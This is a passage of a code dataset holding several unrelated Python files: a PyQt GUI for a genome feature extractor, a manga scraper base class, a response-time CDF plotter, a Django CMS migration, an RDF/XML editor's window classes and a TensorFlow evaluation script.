QPushButton('Load gene list from file')\n self.nameLoadFromFile.clicked.connect(self.loadGeneNameFromFile)\n self.nameSaveToFileBtn = QPushButton('Save gene names to file')\n self.nameSaveToFileBtn.clicked.connect(self.saveGeneNamesToFile)\n self.nameClearWidget = QPushButton('Clear gene names')\n self.nameClearWidget.clicked.connect(self.nameListWidget.clear)\n\n self.nameClearWidget.setEnabled(False)\n self.nameLoadFromFile.setEnabled(False)\n self.nameListWidget.setEnabled(False)\n self.nameBuildbtn.setEnabled(False)\n self.nameManualbtn.setEnabled(False)\n self.nameSaveToFileBtn.setEnabled(False)\n self.nameChk.stateChanged.connect(self.enableWidgets)\n\n self.GFFbtn.clicked.connect(self.selectFile)\n self.Fastabtn.clicked.connect(self.selectFile)\n self.Outputbtn.clicked.connect(self.selectFile)\n\n br_vbox.addWidget(self.BioTypeChk)\n br_vbox.addWidget(self.BioTypeBuildbtn)\n br_vbox.addWidget(self.BioTypeListWidget)\n br_vbox.addWidget(self.ExBioTypeChk)\n br_vbox.addWidget(self.ExBioTypeListWidget)\n\n bm_vbox.addWidget(self.featureTypeChk)\n bm_vbox.addWidget(self.featureTypeBuildbtn)\n bm_vbox.addWidget(self.featureManualEntryBtn)\n bm_vbox.addWidget(self.featureClearBtn)\n bm_vbox.addWidget(self.featureTypeListWidget)\n # bm_vbox.addWidget(self.ExfeatureTypeChk)\n # bm_vbox.addWidget(self.ExfeatureTypeListWidget)\n\n bl_vbox.addWidget(self.nameChk)\n bl_vbox.addWidget(self.nameBuildbtn)\n bl_vbox.addWidget(self.nameLoadFromFile)\n bl_vbox.addWidget(self.nameClearWidget)\n bl_vbox.addWidget(self.nameManualbtn)\n bl_vbox.addWidget(self.nameListWidget)\n bl_vbox.addWidget(self.nameSaveToFileBtn)\n\n b_hbox.addLayout(bl_vbox)\n b_hbox.addLayout(bm_vbox)\n b_hbox.addLayout(br_vbox)\n\n options_grbox.setColumnMinimumWidth(1, 100)\n options_grbox.setColumnMinimumWidth(2, 100)\n options_grbox.addWidget(self.NEcb, 0, 0)\n options_grbox.addWidget(self.nonGFFcb, 0, 1)\n options_grbox.addWidget(self.boundcb, 1, 0)\n options_grbox.addWidget(self.boundlengthsb, 1, 1)\n\n options_grbox.addWidget(self.tsscb, 3, 0)\n options_grbox.addWidget(self.uppertsslabel, 2, 1)\n options_grbox.addWidget(self.uppertsssb, 3, 1)\n options_grbox.addWidget(self.lowertsslabel, 2, 2)\n options_grbox.addWidget(self.lowertsssb, 3, 2)\n 
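# Hand the populated option grid to its group box so the option widgets render as a single framed panel.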
options_gbox.setLayout(options_grbox)\n\n t_hbox.addWidget(files_gbox)\n t_hbox.addWidget(options_gbox)\n\n outervbox.addLayout(t_hbox)\n outervbox.addLayout(b_hbox)\n outervbox.addWidget(make_rocket_go_now)\n self.setLayout(outervbox)\n\n self.setGeometry(300, 300, 1000, 750)\n self.setWindowTitle('GFFExtractor')\n self.show()\n\n @pyqtSlot()\n def selectFile(self):\n source = self.sender()\n\n if 'GFF' in source.text():\n fileName = QFileDialog.getOpenFileName(self)\n self.GFFLe.setText(fileName[0])\n elif 'Fasta' in source.text():\n fileName = QFileDialog.getOpenFileName(self)\n self.FastaLe.setText(fileName[0])\n elif 'Output' in source.text():\n fileName = QFileDialog.getSaveFileName(self)\n self.OutputLe.setText(fileName[0])\n\n @pyqtSlot()\n def enableWidgets(self):\n source = self.sender()\n\n if \"Restrict to selected biotype(s)\" in source.text():\n if source.isChecked():\n self.BioTypeListWidget.setEnabled(True)\n self.BioTypeBuildbtn.setEnabled(True)\n elif not source.isChecked():\n self.BioTypeListWidget.setEnabled(False)\n if not self.ExBioTypeChk.isChecked():\n self.BioTypeBuildbtn.setEnabled(False)\n\n if \"Exclude selected biotype(s)\" in source.text():\n if source.isChecked():\n self.ExBioTypeListWidget.setEnabled(True)\n self.BioTypeBuildbtn.setEnabled(True)\n elif not source.isChecked():\n self.ExBioTypeListWidget.setEnabled(False)\n if not self.BioTypeChk.isChecked():\n self.BioTypeBuildbtn.setEnabled(False)\n\n if \"Restrict to selected feature(s)\" in source.text():\n if source.isChecked():\n self.featureTypeListWidget.setEnabled(True)\n self.featureTypeBuildbtn.setEnabled(True)\n self.featureManualEntryBtn.setEnabled(True)\n elif not source.isChecked():\n self.featureTypeBuildbtn.setEnabled(False)\n self.featureTypeListWidget.setEnabled(False)\n self.featureManualEntryBtn.setEnabled(False)\n # if not self.ExfeatureTypeChk.isChecked():\n # self.featureTypeBuildbtn.setEnabled(False)\n\n # if \"Exclude selected feature(s)\" in source.text():\n # if source.isChecked():\n # self.ExfeatureTypeListWidget.setEnabled(True)\n # self.featureTypeBuildbtn.setEnabled(True)\n # elif not source.isChecked():\n # self.ExfeatureTypeListWidget.setEnabled(False)\n # if not self.featureTypeChk.isChecked():\n # self.featureTypeBuildbtn.setEnabled(False)\n\n if \"Restrict to selected name(s)\" in source.text():\n if source.isChecked():\n self.nameListWidget.setEnabled(True)\n self.nameBuildbtn.setEnabled(True)\n self.nameManualbtn.setEnabled(True)\n self.nameLoadFromFile.setEnabled(True)\n elif not source.isChecked():\n self.nameListWidget.setEnabled(False)\n self.nameBuildbtn.setEnabled(False)\n self.nameManualbtn.setEnabled(False)\n self.nameLoadFromFile.setEnabled(False)\n\n if \"Use gene boundary\" in source.text():\n if source.isChecked():\n self.boundlengthsb.setEnabled(True)\n else:\n self.boundlengthsb.setEnabled(False)\n\n if \"Use transcription\" in source.text():\n if source.isChecked():\n self.lowertsssb.setEnabled(True)\n self.uppertsssb.setEnabled(True)\n else:\n self.lowertsssb.setEnabled(False)\n self.uppertsssb.setEnabled(False)\n\n @pyqtSlot()\n def manualBiotype(self):\n manualName, ok = QInputDialog.getText(self, 'Manual entry', 'Enter a biotype:')\n if ok:\n QListWidgetItem(manualName, self.BioTypeListWidget)\n QListWidgetItem(manualName, self.ExBioTypeListWidget)\n\n @pyqtSlot()\n def callGFFextractor(self):\n source = self.sender()\n\n if 'features' in source.text():\n self.featureTypeListWidget.clear()\n # self.ExfeatureTypeListWidget.clear()\n Features = 
GFFextractor.show_features(self.GFFLe.text())\n for x in Features:\n QListWidgetItem(x,self.featureTypeListWidget)\n self.featureTypeListWidget.setSortingEnabled(True)\n self.featureTypeListWidget.sortItems()\n self.featureClearBtn.setEnabled(True)\n elif 'name' in source.text():\n if self.NEcb.isChecked():\n self.non_ensembl = True\n else:\n self.non_ensembl = False\n GeneNames = GFFextractor.show_genes(self.GFFLe.text(), self.non_ensembl)\n for x in GeneNames:\n QListWidgetItem(x, self.nameListWidget)\n self.nameClearWidget.setEnabled(True)\n self.nameSaveToFileBtn.setEnabled(True)\n elif 'Run GFFExtractor!' in source.text():\n if self.GFFLe.text() == '':\n QMessageBox.warning(self,'No GFF file set','Please select a GFF file.')\n elif self.FastaLe.text() == '':\n QMessageBox.warning(self, 'No Fasta file set', 'Please select a Fasta file.')\n elif self.OutputLe.text() == '':\n QMessageBox.warning(self,'No Output set','Please select a file to write to.')\n else:\n if self.nameChk.isChecked(): self.gene_name = [str(x.text()) for x in\n self.nameListWidget.selectedItems()]\n if self.featureTypeChk.isChecked(): self.feature_type = [str(y.text()) for y in\n self.featureTypeListWidget.selectedItems()]\n if self.NEcb.isChecked(): self.non_ensembl = True\n if (int(self.boundlengthsb.text()) > 0) and self.boundcb.isChecked():\n self.bound = int(self.boundlengthsb.text())\n self.biotype = [str(x.text()) for x in self.BioTypeListWidget.selectedItems()]\n self.ebiotype = [str(x.text()) for x in self.ExBioTypeListWidget.selectedItems()]\n if self.tsscb.isChecked():\n if (self.uppertsssb.text() and self.lowertsssb.text()):\n self.tss = [int(self.uppertsssb.text()), int(self.lowertsssb.text())]\n print(\"Cutting from {} to {} relative to the tss\".format(self.tss[0],self.tss[1]))\n else:\n QMessageBox.warning(self, 'No tss values set', \"Please make sure that both an upstream and a downstream \"\n \"value are set for the tss boundary\")\n\n result = GFFextractor.extract(gfffile=self.GFFLe.text(), fastafile=self.FastaLe.text(),\n feature_type=self.feature_type, outfile=self.OutputLe.text(), gene_name=self.gene_name,\n non_ensembl=self.non_ensembl, boundary=self.bound, bio=self.biotype, exbio=self.ebiotype,\n geneIDs=None, genelist=False, tss=self.tss, window=self)\n if result == 'oops':\n QMessageBox.warning(self,'GFFextractor error','Looks like GFFextractor had a problem. 
Please see '\n 'the console for more info.')\n else:\n QMessageBox.warning(self,'GFFextractor finished','Job done!')\n\n @pyqtSlot()\n def manualGeneName(self):\n manualName, ok = QInputDialog.getText(self, 'Manual entry', 'Enter a gene name:')\n if ok:\n QListWidgetItem(manualName, self.nameListWidget)\n self.nameSaveToFileBtn.setEnabled(True)\n self.nameClearWidget.setEnabled(True)\n\n @pyqtSlot()\n def manualFeatureName(self):\n manualFeature, ok = QInputDialog.getText(self, 'Manual entry', 'Enter a feature type:')\n if ok:\n QListWidgetItem(manualFeature, self.featureTypeListWidget)\n self.featureClearBtn.setEnabled(True)\n\n @pyqtSlot()\n def loadGeneNameFromFile(self):\n genefile = QFileDialog.getOpenFileName(self)\n if genefile[0]:\n with open(genefile[0],'rU') as f:\n names = [name for name in f.readlines()]\n for x in names:\n QListWidgetItem(x.strip('\\r\\n'),self.nameListWidget)\n self.nameSaveToFileBtn.setEnabled(True)\n self.nameClearWidget.setEnabled(True)\n\n @pyqtSlot()\n def saveGeneNamesToFile(self):\n fileName = QFileDialog.getSaveFileName(self)\n lst = [i.text() for i in self.nameListWidget.findItems(\"\", Qt.MatchContains)]\n with open(fileName[0], 'w') as of:\n for x in lst:\n of.writelines(str(x) + '\\n')\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MainWindow()\n sys.exit(app.exec_())\n","sub_path":"GFEwindow.py","file_name":"GFEwindow.py","file_ext":"py","file_size_in_byte":20326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"119492061","text":"import logging\nfrom collections import namedtuple\n\nimport requests\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=' %(asctime)s - %(levelname)s - %(message)s'\n)\n\nManga = namedtuple('Manga', ['url', 'title', 'is_complete'])\n\nclass GenericWorker:\n session = requests.session()\n\n def get_response(self, method, url, **kwargs):\n try:\n response = self.session.request(method, url, **kwargs)\n response.raise_for_status()\n except requests.exceptions.HTTPError as err:\n logging.critical('An error happened during the request')\n else:\n return response\n\n return None\n\n @staticmethod\n def manga_factory(url, title, is_complete):\n manga = Manga(url, title, is_complete)\n return manga\n\n def get_manga_list(self, save=False):\n\n response = self.get_catalog()\n\n mangas = self.parse_catalog(response)\n\n if save:\n mangas = self.save_mangas(mangas)\n\n return mangas\n\n def get_catalog(self):\n raise NotImplementedError('This method must be implemented')\n\n def parse_catalog(self, response):\n raise NotImplementedError('This method must be implemented')\n\n def save_mangas(self, mangas):\n raise NotImplementedError('This method must be implemented')\n","sub_path":"workers/generic_worker.py","file_name":"generic_worker.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"3629421","text":"import os\nimport collections\n\nimport pandas as pd\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\n\nimport stethoscope.plotting_constants as plotting_constants\n\nclass ResponseTimesCDF:\n\n FILENAME = 'cdf_response_times.png'\n\n @classmethod\n def comparative_plot_normalized(cls: type, simulations_by_name : dict, simulation_step : pd.Timedelta, figures_dir : str = None, names_converter = None):\n\n fulfilled_cnt_regionalized = collections.defaultdict(lambda: collections.defaultdict(lambda: collections.defaultdict(int)))\n for 
simulation_name, simulation_instances in simulations_by_name.items():\n for simulation in simulation_instances:\n for region_name, response_times_per_request_type in simulation.response_times.items():\n for req_type, response_times in response_times_per_request_type.items():\n fulfilled_cnt_regionalized[region_name][req_type][simulation_name] += len(response_times)\n\n fulfilled_cnt_regionalized_maximums = collections.defaultdict(lambda: collections.defaultdict(int))\n for region_name, fulfilled_cnt_per_request_type in fulfilled_cnt_regionalized.items():\n for req_type, fulfilled_cnt_per_simulation in fulfilled_cnt_per_request_type.items():\n fulfilled_cnt_regionalized_maximums[region_name][req_type] = max(fulfilled_cnt_per_simulation.values())\n\n normalization_coefs = collections.defaultdict(lambda: collections.defaultdict(lambda: collections.defaultdict(float)))\n for region_name, fulfilled_cnt_per_request_type in fulfilled_cnt_regionalized.items():\n for req_type, fulfilled_cnt_per_simulation in fulfilled_cnt_per_request_type.items():\n for sim_name, fulfilled_cnt in fulfilled_cnt_per_simulation.items():\n normalization_coefs[sim_name][region_name][req_type] = fulfilled_cnt / fulfilled_cnt_regionalized_maximums[region_name][req_type]\n\n cls.comparative_plot(simulations_by_name, simulation_step, figures_dir, names_converter, normalization_coefs)\n\n @classmethod\n def comparative_plot(cls: type, simulations_by_name : dict, simulation_step : pd.Timedelta, figures_dir : str = None, names_converter = None, normalization_coefs = None):\n\n regions = list()\n response_times_regionalized_aggregated = collections.defaultdict(lambda: collections.defaultdict(lambda: collections.defaultdict(list)))\n for simulation_name, simulation_instances in simulations_by_name.items():\n\n for simulation in simulation_instances:\n for region_name, response_times_per_request_type in simulation.response_times.items():\n for req_type, response_times in response_times_per_request_type.items():\n response_times_regionalized_aggregated[simulation_name][region_name][req_type].extend(response_times)\n\n regions.append(region_name)\n\n for region_name in regions:\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n\n for simulation_name, response_times_regionalized_per_sim in response_times_regionalized_aggregated.items():\n simulation_name_as_label = names_converter(simulation_name)\n normalization_coef = normalization_coefs[simulation_name][region_name] if not normalization_coefs is None else None\n cls._internal_plot(ax, response_times_regionalized_per_sim[region_name], simulation_step, simulation_name_as_label, normalization_coef)\n\n cls._internal_post_processing(ax, region_name, figures_dir, len(response_times_regionalized_aggregated), normalization_coefs)\n\n @classmethod\n def plot(cls : type, response_times_regionalized : dict, simulation_step : pd.Timedelta, figures_dir : str = None):\n\n for region_name, response_times_per_request_type in response_times_regionalized.items():\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n cls._internal_plot(ax, response_times_per_request_type, simulation_step)\n cls._internal_post_processing(ax, region_name, figures_dir)\n\n @classmethod\n def _internal_plot(cls : type, ax, response_times_per_request_type : dict, simulation_step : pd.Timedelta, additional_label : str = None, normalization_coef : dict = None):\n\n present_request_types_cnt = len([ True for resp_times in response_times_per_request_type.values() if len(resp_times) > 0 ])\n\n if 
present_request_types_cnt > 0:\n simulation_step_ms = simulation_step.microseconds // 1000\n max_response_times_by_req_type = [max(response_times_of_req) for response_times_of_req in response_times_per_request_type.values() if len(response_times_of_req) > 0 ]\n max_response_time = max(max_response_times_by_req_type) if len(max_response_times_by_req_type) > 0 else 0\n cdf_xlim = int(max_response_time + simulation_step_ms)\n x_axis_step = max(simulation_step_ms, cdf_xlim // 100)\n x_axis = range(0, cdf_xlim, x_axis_step)\n\n cdfs_per_req_type = {}\n for req_type, response_times in response_times_per_request_type.items():\n reqs_count_binned = [0] * len(x_axis)\n\n for response_time in response_times:\n reqs_count_binned[int(response_time // x_axis_step)] += 1\n\n cdfs_per_req_type[req_type] = np.cumsum(reqs_count_binned) / sum(reqs_count_binned)\n if not normalization_coef is None:\n cdfs_per_req_type[req_type] *= normalization_coef[req_type]\n\n for req_type, cdf_vals in cdfs_per_req_type.items():\n lbl = f'{additional_label}:\\n{req_type}' if not additional_label is None else req_type\n ax.plot(x_axis, cdf_vals, label = lbl)\n\n @classmethod\n def _internal_post_processing(cls : type, ax, region_name : str, figures_dir : str = None, ncol : int = 1, normalization_coefs : dict = None):\n\n percentiles = [0.99, 0.95, 0.90, 0.80, 0.50]\n font = {'color': 'black', 'weight': 'normal', 'size': 8}\n for percentile in percentiles:\n ax.axhline(percentile, 0, 1.0, color = 'k', linestyle = 'dashed', lw = 0.5)\n ax.text(0, percentile + 0.002, f\"{(int(percentile * 100))}th percentile\", fontdict = font)\n\n plt.xlabel('Response time, ms')\n plt.legend(loc = 'upper center', ncol = min(ncol, 2), bbox_to_anchor = (0.5, -0.15))\n\n if not figures_dir is None:\n fname = plotting_constants.filename_format.format(region_name, cls.FILENAME)\n if not normalization_coefs is None:\n fname = f'normalized-{fname}'\n figure_path = os.path.join(figures_dir, fname)\n plt.savefig(figure_path, dpi = plotting_constants.PUBLISHING_DPI, bbox_inches='tight')\n else:\n plt.title(f'CDF of requests by response time in region {region_name}')\n plt.show()\n\n plt.close()\n","sub_path":"stethoscope/autoscaling_quality/response_times_cdf.py","file_name":"response_times_cdf.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"200364803","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom decimal import Decimal\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0002_auto_20151112_1449'),\n ('cms', '0012_auto_20150607_2207'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ProductPlugin',\n fields=[\n ('cmsplugin_ptr', models.OneToOneField(to='cms.CMSPlugin', serialize=False, parent_link=True, primary_key=True, auto_created=True)),\n ('link', models.URLField(null=True, blank=True, verbose_name='Link')),\n ('image', models.ImageField(null=True, upload_to='', blank=True, verbose_name='Image')),\n ('image_overlay', models.ImageField(null=True, upload_to='', blank=True, verbose_name='Image overlay')),\n ('price', models.DecimalField(validators=[django.core.validators.MinValueValidator(Decimal('0.01'))], verbose_name='Price', null=True, decimal_places=2, max_digits=10, blank=True)),\n ('from_price', models.DecimalField(validators=[django.core.validators.MinValueValidator(Decimal('0.01'))], 
verbose_name='From price', null=True, decimal_places=2, max_digits=10, blank=True)),\n ('template', models.CharField(max_length=255, choices=[('product_plugin/image_on_left.html', 'Image on left'), ('product_plugin/image_on_right.html', 'Image on right')], verbose_name='Template')),\n ('button_text', models.ForeignKey(verbose_name='Button text', null=True, blank=True, related_name='product_button_texts', to='content.Content')),\n ('content', models.ForeignKey(verbose_name='Text', null=True, blank=True, to='content.Content')),\n ('pre_title', models.ForeignKey(verbose_name='Pre title', null=True, blank=True, related_name='pretitles', to='content.Content')),\n ('sub_title', models.ForeignKey(verbose_name='Subtitle', null=True, blank=True, related_name='subtitles', to='content.Content')),\n ('title', models.ForeignKey(verbose_name='Title', null=True, blank=True, related_name='product_titles', to='content.Content')),\n ],\n options={\n 'abstract': False,\n },\n bases=('cms.cmsplugin',),\n ),\n ]\n","sub_path":"product_plugin/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"354091538","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 14 13:50:31 2018\n\n@author: z003umpb\n\"\"\"\nimport tempfile\nimport os\n\nfrom PyQt5.QtCore import QFile,\\\n QFileInfo,\\\n QTextStream,\\\n Qt,\\\n pyqtSignal\n\nfrom PyQt5.QtGui import QIcon\n \nfrom PyQt5.QtWidgets import QApplication,\\\n QFileDialog,\\\n QMessageBox\n\nfrom rdfxmleditor import RDFXmlEditor, RDFXmlTemplateEditor\nfrom rdfnavigatorxmldata import RDFNavigatorXmlSchema\nfrom rdfnavigatorthreads import RDFNavigatorTransformThread\n\n\nclass RDFNavigatorChildrenTypes(object):\n RDF, XML, SCHEMA, TEMPLATE = range(0, 4)\n\n\nclass RDFNavigatorChildBase(object):\n\n bookmark_added = pyqtSignal(str, int, str)\n bookmark_deleted = pyqtSignal(str, int, str)\n\n def newFile(self):\n pass\n\n def loadFile(self, fileName):\n pass\n\n def setManager(self, manager):\n self.manager = manager\n\n def save(self):\n if self.isUntitled:\n return self.saveAs()\n else:\n return self.saveFile(self.curFile)\n\n def saveAs(self):\n fileName, _ = QFileDialog.getSaveFileName(self, \"Save As\", self.curFile)\n if not fileName:\n return False\n\n return self.saveFile(fileName)\n\n def saveFile(self, fileName):\n return True\n\n def userFriendlyCurrentFile(self):\n return self.strippedName(self.curFile)\n\n def currentFile(self):\n return self.curFile\n\n def closeEvent(self, event):\n if self.maybeSave():\n event.accept()\n else:\n event.ignore()\n\n def documentWasModified(self):\n self.setWindowModified(self.isModified())\n\n def maybeSave(self):\n if self.isModified():\n ret = QMessageBox.warning(self, \"RDF Navigator\", \"'%s' has been modified.\\nDo you want to save your changes?\" % self.userFriendlyCurrentFile(), QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel)\n if ret == QMessageBox.Save:\n return self.save()\n if ret == QMessageBox.Cancel:\n return False\n return True\n\n def setCurrentFile(self, fileName):\n self.curFile = QFileInfo(fileName).canonicalFilePath()\n self.isUntitled = False\n self.setModified(False)\n self.setWindowModified(False)\n self.setWindowTitle(self.userFriendlyCurrentFile() + \"[*]\")\n\n def strippedName(self, fullFileName):\n return QFileInfo(fullFileName).fileName()\n\n\nclass RDFNavigatorXmlChild(RDFXmlEditor, RDFNavigatorChildBase):\n sequenceNumber = 1\n 
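# relays console output from the RDF<->XML transform thread (connected in loadRdf below)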
output_message = pyqtSignal(str)\n\n def __init__(self, parent=None):\n super(RDFNavigatorXmlChild, self).__init__(parent)\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setWindowIcon(QIcon(':/images/xml.png'))\n self.isUntitled = True\n self.isRdf = False\n self.isSchema = False\n self.parent = parent\n self.marker_added.connect(self.createBookmark)\n self.marker_deleted.connect(self.deleteBookmark)\n\n def newFile(self):\n self.isUntitled = True\n self.curFile = \"document%d.xml\" % RDFNavigatorXmlChild.sequenceNumber\n RDFNavigatorXmlChild.sequenceNumber += 1\n self.setWindowTitle(self.curFile + '[*]')\n self.textChanged.connect(self.documentWasModified)\n\n def loadFile(self, fileName):\n if fileName.endswith('.xml'):\n self.isRdf = False\n self.loadXml(fileName)\n elif fileName.endswith('.rdf'):\n self.isRdf = True\n self.loadRdf(fileName)\n elif fileName.endswith('.xsd'):\n self.isRdf = False\n self.loadXsd(fileName)\n return True\n\n def saveFile(self, fileName):\n if self.isRdf:\n self.saveRdf(fileName)\n else:\n self.saveXml(fileName)\n return True\n\n def loadXml(self, fileName):\n file = QFile(fileName)\n if not file.open(QFile.ReadOnly | QFile.Text):\n QMessageBox.warning(self, \"RDFNavigator\", \"Cannot read file {0}:\\n{1}.\".format(fileName, file.errorString()))\n return False\n instr = QTextStream(file)\n QApplication.setOverrideCursor(Qt.WaitCursor)\n self.setText(instr.readAll())\n self.indicateUlrs()\n QApplication.restoreOverrideCursor()\n if self.isRdf:\n fileName = fileName.replace('.xml', '.rdf')\n self.setCurrentFile(fileName)\n self.textChanged.connect(self.documentWasModified)\n\n def loadXsd(self, fileName):\n self.isSchema = True\n self.loadXml(fileName)\n\n def loadRdf(self, fileName):\n tools = self.manager.getConfig('rdf_tools', '')\n plugins = self.manager.getConfig('rdf_plugins', '')\n thread = RDFNavigatorTransformThread(fileName=fileName, direction='rdf2xml', rdf_tools=tools, rdf_plugins=plugins)\n thread.rdf2xml_transform_done.connect(self.loadXml)\n thread.transform_output.connect(self.output_message)\n thread.run()\n\n def saveRdf(self, fileName):\n fd, tempFile = tempfile.mkstemp(suffix='.xml', prefix='temp')\n os.close(fd)\n self.saveXml(tempFile)\n self.setCurrentFile(fileName)\n tools = self.manager.getConfig('rdf_tools', '')\n plugins = self.manager.getConfig('rdf_plugins', '')\n thread = RDFNavigatorTransformThread(fileName=tempFile, orig_file_name=fileName, direction='xml2rdf', rdf_tools=tools, rdf_plugins=plugins)\n thread.rdf2xml_transform_done.connect(self.postSaveRdf)\n thread.run()\n\n def postSaveRdf(self, originalFileName, fileName):\n os.rename(fileName, originalFileName)\n\n def saveXml(self, fileName):\n file = QFile(fileName)\n\n if not file.open(QFile.WriteOnly | QFile.Text):\n QMessageBox.warning(self, \"RDF Navigator\", \"Cannot write file %s:\\n%s.\" % (fileName, file.errorString()))\n return False\n outstr = QTextStream(file)\n QApplication.setOverrideCursor(Qt.WaitCursor)\n outstr << self.text()\n QApplication.restoreOverrideCursor()\n self.setCurrentFile(fileName)\n\n\n def validateDocument(self):\n \"\"\"TODO: Source schema needs to be attached \"\"\"\n schemaPath = self.manager.getConfig('rdf_schemas', '')\n schema = RDFNavigatorXmlSchema()\n schema.validation_message.connect(self.parent.output_message)\n schema.setSchemaPath(os.path.join(schemaPath, 'RdfMain.xsd'))\n schema.validateDocument(self.text())\n\n def contextMenuEvent(self, e):\n menu = self.createBasicContextMenu()\n validateDocAction = menu.addAction(\"Validate 
document\", self.validateDocument)\n action = menu.exec_(self.mapToGlobal(e.pos()))\n\nclass RDFNavigatorSchemaChild(RDFNavigatorXmlChild):\n def __init__(self, parent=None):\n super(RDFNavigatorSchemaChild, self).__init__(parent)\n\n\nclass RDFNavigatorTemplateChild(RDFXmlTemplateEditor, RDFNavigatorChildBase):\n sequenceNumber = 1\n\n\n def __init__(self, parent=None):\n super(RDFNavigatorTemplateChild, self).__init__(parent)\n self.marker_added.connect(self.createBookmark)\n self.marker_deleted.connect(self.deleteBookmark)\n\n def newFile(self):\n self.isUntitled = True\n self.curFile = \"template%d.xml\" % RDFNavigatorTemplateChild.sequenceNumber\n RDFNavigatorTemplateChild.sequenceNumber += 1\n self.setWindowTitle(self.curFile + '[*]')\n self.textChanged.connect(self.documentWasModified)\n\n def loadFile(self, fileName):\n self.loadTemplate(fileName)\n return True\n\n def saveFile(self, fileName):\n self.saveTemplate(fileName)\n\n def loadTemplate(self, fileName):\n file = QFile(fileName)\n if not file.open(QFile.ReadOnly | QFile.Text):\n QMessageBox.warning(self, \"RDFNavigator\", \"Cannot read temlate file {0}:\\n{1}.\".format(fileName, file.errorString()))\n return False\n instr = QTextStream(file)\n QApplication.setOverrideCursor(Qt.WaitCursor)\n self.setText(instr.readAll())\n self.indicateAll()\n QApplication.restoreOverrideCursor()\n self.setCurrentFile(fileName)\n\n def saveTemplate(self, fileName):\n file = QFile(fileName)\n\n if not file.open(QFile.WriteOnly | QFile.Text):\n QMessageBox.warning(self, \"RDF Navigator\", \"Cannot write template file %s:\\n%s.\" % (fileName, file.errorString()))\n return False\n outstr = QTextStream(file)\n QApplication.setOverrideCursor(Qt.WaitCursor)\n outstr << self.text()\n QApplication.restoreOverrideCursor()\n self.setCurrentFile(fileName)\n\n","sub_path":"rdfnavigatorchildren.py","file_name":"rdfnavigatorchildren.py","file_ext":"py","file_size_in_byte":8757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"65033048","text":"import os\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\n\nfrom train import input_data\n\n\ndef eval_method(net1, net2):\n d = tf.sqrt(tf.reduce_sum(tf.pow(net1 - net2, 2), 1, keep_dims=True))\n thres = tf.constant(0.2)\n return tf.cast(tf.greater(d, thres), tf.int32)\n\n\nif __name__ == '__main__':\n test_dir = './Pair_data'\n logdir = './logs_test'\n ckpt_dir = './checkpoints/'\n ckpt_path = './checkpoints/model.ckpt-2000'\n tf.logging.set_verbosity(tf.logging.DEBUG)\n num_evals = 1\n img1_batch, img2_batch, label_batch = input_data(test_dir, 100, convert_to_one_hot=False)\n\n batch_queue = slim.prefetch_queue.prefetch_queue(\n [img1_batch, img2_batch, label_batch], capacity=2)\n images1, images2, labels = batch_queue.dequeue()\n label_batch = tf.cast(label_batch, dtype=tf.float32)\n saver = tf.train.Saver()\n predictions = eval_method(net1, net2)\n # names_to_values, names_to_updates = slim.metrics.aggregate_metric_map({\n # \"accuracy\": slim.metrics.accuracy(predictions, labels),\n # \"mse\": slim.metrics.mean_squared_error(predictions, labels),\n # })\n\n # names_to_values, names_to_updates = slim.metrics.aggregate_metric_map({\n # 'accuracy': slim.metrics.accuracy(predictions, labels),\n # # 'precision': slim.metrics.precision(predictions, labels),\n # # 'recall': slim.metrics.recall(mean_relative_errors, 0.3),\n # })\n\n # summary_ops = []\n # for metric_name, metric_value in names_to_values.iteritems():\n # op = 
tf.summary.scalar(metric_name, metric_value)\n    #     op = tf.Print(op, [metric_value], metric_name)\n    #     summary_ops.append(op)\n\n    acc = slim.metrics.accuracy(predictions, labels)\n\n    # slim.get_or_create_global_step()\n\n    # slim.evaluation.evaluation_loop(\n    #     '',\n    #     ckpt_dir,\n    #     logdir,\n    #     num_evals=num_evals,\n    #     eval_op=acc,\n    #     # eval_op=acc,\n    #     # summary_op=tf.contrib.deprecated.merge_summary(summary_ops),\n    #     # summary_op=tf.summary.merge(summary_ops),\n    #     eval_interval_secs=60)\n\n    with tf.Session() as sess:\n        sess.run(tf.global_variables_initializer())  # initialize first, then restore, so checkpoint values are not overwritten\n        saver.restore(sess, ckpt_path)\n\n        coord = tf.train.Coordinator()\n        # use start_queue_runners to start filling the input queues\n        threads = tf.train.start_queue_runners(sess, coord)\n\n        try:\n            while not coord.should_stop():\n                print('************')\n                # fetch batch_size samples and labels for each batch\n                accuracy = sess.run(acc)\n                print(accuracy)\n        except tf.errors.OutOfRangeError:  # raised when the end of the file queue is reached\n            print(\"done! now let's kill all the threads...\")\n        finally:\n            # the coordinator signals all threads to stop\n            coord.request_stop()\n            print('all threads are asked to stop!')\n            coord.join(threads)  # join the started threads back into the main thread and wait for them to finish\n            print('all threads are stopped!')\n\n\n\n","sub_path":"Discrimination_Net/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
